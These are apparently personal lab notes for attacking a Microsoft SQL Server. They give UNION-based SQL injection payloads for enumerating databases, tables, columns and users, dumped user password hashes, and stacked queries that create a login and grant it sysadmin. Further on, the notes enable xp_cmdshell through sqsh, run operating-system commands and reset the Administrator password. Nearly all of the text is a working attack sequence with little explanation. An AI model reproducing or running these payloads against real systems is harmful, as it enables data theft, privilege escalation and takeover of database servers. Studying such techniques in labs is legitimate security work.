MS-SQL Notes


' ORDER BY 2--

' UNION SELECT NULL, NULL--

' UNION SELECT 'amanda', NULL--

' UNION SELECT @@version, NULL--

' UNION SELECT DB_NAME(1), NULL--   (master, tempdb, model, msdb, music,)

' UNION SELECT name, NULL FROM master ..sysdatabases-- (WHYYY)
^- lists all database names (not tables)

' UNION SELECT TABLE_NAME,NULL FROM information_schema.TABLES--
(albums, concerts, singles, songs, users)

' UNION SELECT column_name,NULL FROM information_schema.COLUMNS--
(artist, id, name, pass, place, year)

' UNION SELECT name,NULL FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')--
(id, name, pass)

' UNION SELECT name,NULL FROM users--
(alice, brett, eric, peter)

' UNION SELECT pass,NULL FROM users--
123pass123
34819d7beeabb9260a5c854bc85b3e99
5f4dcc3b5aa765d61d8327deb882cf99
7d9264f1c1c042b799ef08da95a782d4

CREATE LOGIN amanda WITH PASSWORD = 'password'

' UNION select name, NULL from sys.server_principals--
DJ\Administrator 
dbo

SELECT name, password_hash FROM sys.sql_logins  

UNION SELECT password_hash, NULL FROM sys.sql_logins--   

' UNION SELECT name,NULL FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'sys.server_principals')--     


Microsoft SQL Server 2012 - 11.0.2100.60 (X64) Feb 10 2012 19:39:15 Copyright (c) Microsoft Corporation Express Edition (64-bit) on Windows NT 6.2 (Build 9200: ) (Hypervisor)

' UNION SELECT @@version, NULL; CREATE LOGIN amanda WITH PASSWORD = 'password'--

IMPORTANT
' UNION SELECT @@version, NULL; EXEC sp_addlogin 'zoey', 'password'; --priv--
' UNION SELECT @@version, NULL; EXEC sp_addsrvrolemember 'zoey', 'sysadmin'; --priv--
IMPORTANT

sqsh -S 192.168.5.128 -U amanda
sp_configure 'show advanced options', '1'
go
RECONFIGURE
#this enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
go 
RECONFIGURE
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
go
EXEC master..xp_cmdshell 'net user'
go
EXEC master..xp_cmdshell 'net user Administrator password'
go
